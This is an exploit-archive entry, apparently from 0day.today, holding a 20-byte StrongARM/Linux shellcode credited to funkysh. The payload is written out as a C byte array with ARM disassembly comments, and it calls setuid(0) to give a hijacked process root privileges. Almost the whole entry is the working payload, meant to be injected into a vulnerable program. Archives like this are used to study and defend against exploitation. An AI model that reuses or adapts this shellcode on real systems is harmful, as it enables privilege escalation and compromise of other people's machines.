id: 29469
date: 01/12/2018
title: Linux/StrongARM - setuid() Shellcode (20 bytes)
author: funkysh
cves: 

/*
 * 20 byte StrongARM/Linux setuid() shellcode
 * funkysh
 */
 
char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
                  "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */
                  "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */
                  "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */
                  "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */

#  0day.today [2023-03-26]  #